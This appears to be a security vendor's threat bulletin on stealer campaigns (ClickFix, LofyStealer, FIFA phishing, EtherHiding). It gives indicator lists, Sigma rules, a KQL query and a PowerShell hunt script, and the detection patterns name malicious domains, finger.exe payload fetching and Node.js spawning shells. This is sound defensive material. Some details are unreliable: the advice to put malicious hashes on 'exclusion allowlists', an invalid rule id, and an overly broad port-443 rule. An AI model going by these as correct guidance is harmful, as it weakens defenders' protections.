Recent OTX pulse data indicates a coordinated surge in credential theft operations exploiting diverse initial access vectors. Threat actors are pivoting from traditional phishing to sophisticated social engineering lures ("ClickFix" and "BackgroundFix"), supply chain compromises (NPM trojans), and event-based fraud (FIFA World Cup 2026).

Notably, the integration of blockchain technology (Binance Smart Chain testnet) for command-and-control (C2) infrastructure via "EtherHiding" represents a significant evolution in resilience against takedowns. The primary objective across these campaigns is financial monetization through the theft of browser credentials, cookies, and cryptocurrency wallet data, facilitated by malware families such as LofyStealer, Vidar, CastleStealer, and SectopRAT.

Threat Actor / Malware Profile

ClickFix & CastleLoader

• Profile: A social engineering campaign masquerading as fake utilities like "BackgroundFix."
• Distribution: Users are tricked into copying malicious clipboard commands to "verify human" status.
• Behavior: The copied command invokes finger.exe, a native Windows utility, to fetch and execute the CastleLoader payload.
• Payloads: CastleLoader acts as a dropper for NetSupport RAT (remote access) and CastleStealer (credential harvesting).

LofyGang (LofyStealer)

• Profile: Targets the gaming community, specifically Minecraft players.
• Distribution: Social engineering lures distributing malicious Node.js packages masquerading as legitimate gaming libraries.
• Behavior: Uses a two-stage process: a bulky Node.js loader that unpacks a lightweight C++ payload directly into memory to evade disk-based detection.
• Payloads: LofyStealer (also known as GrabBot/Slinky) extracts browser data (passwords, cookies, crypto tokens) from eight different browsers.

GHOST STADIUM

• Profile: Chinese-speaking threat actor targeting high-value international events.
• Distribution: over 4,300 fraudulent domains impersonating FIFA infrastructure, utilizing pixel-perfect clones of official authentication systems.
• Behavior: Massive phishing-as-a-service ecosystem focusing on ticket fraud and credential harvesting.
• Payloads: Victims are often infected with Vidar and Lumma stealers upon interacting with the fraudulent sites.

EtherHiding / ClearFake

• Profile: Technical innovation in C2 resilience using blockchain smart contracts.
• Distribution: Compromised legitimate websites injected with malicious JavaScript.
• Behavior: The JavaScript queries the Binance Smart Chain (BSC) testnet to retrieve payload routing instructions stored in immutable smart contracts.
• Payloads: Delivers SectopRAT and ACRStealer.

IOC Analysis

The provided pulses contain a high volume of actionable indicators:

• Domains: High-volume phishing domains (e.g., fifa.gold, fifa.black, trindastal.com) and C2 domains (e.g., driver-updater.net). SOC teams should immediately block these at the perimeter and DNS layer.
• File Hashes: Multiple SHA256 and MD5 hashes associated with the Node.js loaders, C++ payloads, and reflective loaders. These should be added to EDR exclusion allowlists (if safe) or blocklists immediately.
• Network Artifacts: Specific URLs and IPs (e.g., 148.178.22.16) and ports (e.g., :688) used for payload retrieval.
• Operationalization:
  • SIEM: Correlate DeviceNetworkEvents connecting to the listed domains/ports.
  • EDR: Scan for the specific file hashes (SHA256: bde21d8..., 293006c...).
  • Threat Intel Platforms: Ingest the pulse lists to automate blocking of future indicators from these adversary clusters.

Detection Engineering

title: Suspicious Finger.exe Execution - Potential ClickFix Activity
id: 6a8b1c9d-0e4f-4a2b-8c3d-1e5f6a7b8c9d
description: Detects the execution of finger.exe, often abused in ClickFix campaigns to retrieve payloads. Uses process creation command line logging.
status: experimental
date: 2026/06/02
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6604b9e8e14e0426680610eb
tags:
    - attack.initial_access
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\finger.exe'
    condition: selection
falsepositives:
    - Legitimate administration usage (rare)
level: high
---
title: Potential EtherHiding C2 via BSC Testnet
id: 7b9c2d0e-1f5a-5b3c-9d4e-2f60a8b9c0d1
description: Detects processes connecting to Binance Smart Chain (BSC) Testnet RPC endpoints (ports 8545 or 443) from non-crypto applications.
status: experimental
date: 2026/06/02
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6657221d6863d43800419333
tags:
    - attack.command_and_control
    - attack.defense_evasion
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationPort:
            - 8545
            - 443
        Initiated: 'true'
    filter_legit_crypto:
        Image|contains:
            - 'metamask'
            - 'brave'
            - 'chrome'
            - 'edge'
    condition: selection and not filter_legit_crypto
falsepositives:
    - Legitimate Web3 dApp interactions
level: medium
---
title: Node.js Spawning Child Processes - LofyStealer Suspicion
id: 8c0d3e1f-2g6b-0a4d-0e5f-3a71b9c0d1e2
description: Detects Node.js processes spawning cmd.exe, powershell.exe, or other shells, indicative of Node-based loaders like LofyStealer.
status: experimental
date: 2026/06/02
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6651ceba0e5e0858e9e8614f
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        Image|endswith: '\node.exe'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate development scripts
level: medium


kql// Hunt for ClickFix related Finger.exe execution and Network Connections
DeviceProcessEvents
| where FileName in~ ("finger.exe", "cmd.exe", "powershell.exe")
| where ProcessCommandLine contains "finger" or ProcessCommandLine contains "http://"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| union (DeviceNetworkEvents
| where RemoteUrl in~ ("trindastal.com", "poronto.com", "fifa.gold", "fifa.black", "driver-updater.net", "giovettiadv.com")
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName)


powershell# IOC Hunt Script for ClickFix and Ghost Stadium
# Requires Admin Privileges

$MaliciousDomains = @(
    "trindastal.com", "poronto.com", "brionter.com",
    "fifa.gold", "fifa.black", "fifa.tax", "fifaweb.com",
    "driver-updater.net", "live.ong"
)

$MaliciousHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881"
)

Write-Host "[+] Checking for Malicious Processes (finger.exe)..."
$Process = Get-Process -Name "finger" -ErrorAction SilentlyContinue
if ($Process) { Write-Host "[!] ALERT: finger.exe process found running! PID: $($Process.Id)" -ForegroundColor Red }

Write-Host "[+] Scanning Hosts file for IoCs..."
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath
    foreach ($Domain in $MaliciousDomains) {
        if ($HostsContent -like "*$Domain*") {
            Write-Host "[!] ALERT: Domain $Domain found in hosts file!" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking recent downloads for file hashes..."
$UserFolder = $env:USERPROFILE
$RecentFiles = Get-ChildItem -Path "$UserFolder\Downloads" -Recurse -File -ErrorAction SilentlyContinue | Where-Object { $_.Length -gt 1kb -and $_.Length -lt 100mb }
foreach ($File in $RecentFiles) {
    $Hash = (Get-FileHash -Path $File.FullName -Algorithm SHA256).Hash.ToLower()
    if ($MaliciousHashes -contains $Hash) {
        Write-Host "[!] ALERT: Malicious file detected at $($File.FullName)" -ForegroundColor Red
    }
}
Write-Host "[-] Hunt Complete."


---

# Response Priorities

Immediate (0-12 hours)

1. Block IoCs: Implement block rules on firewalls, proxies, and Secure Web Gateways (SWG) for all listed domains (fifa.*, trindastal.com, etc.) and IPs (148.178.22.16).
2. Hunt for Execution: Run the PowerShell script across the enterprise to identify hosts with finger.exe processes or malicious file hashes.
3. Takedown Compromised Sites: If internal infrastructure is hosting the malicious domains (unlikely based on external IoCs, but good practice), isolate them immediately.

24 Hours

1. Credential Reset: Force password resets for users identified as potentially interacting with phishing kits (specifically FIFA-related or crypto-development teams targeted by JINX-0164).
2. Session Revocation: Revoke all active session tokens for corporate webmail and VPNs to mitigate the impact of stolen cookies/tokens (primary goal of LofyStealer and Vidar).

1 Week

1. Architecture Hardening: Restrict the ability to run finger.exe and other legacy utilities via Application Control policies (AppLocker/WDAC).
2. Supply Chain Security: Audit NPM packages and dependencies used by development teams, particularly those working on cryptocurrency projects, to prevent JINX-0164 supply chain injections.
3. User Awareness: Launch targeted phishing simulations mimicking "ClickFix" style fake browser updates and "BackgroundFix" tools to train users against clipboard hijacking.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub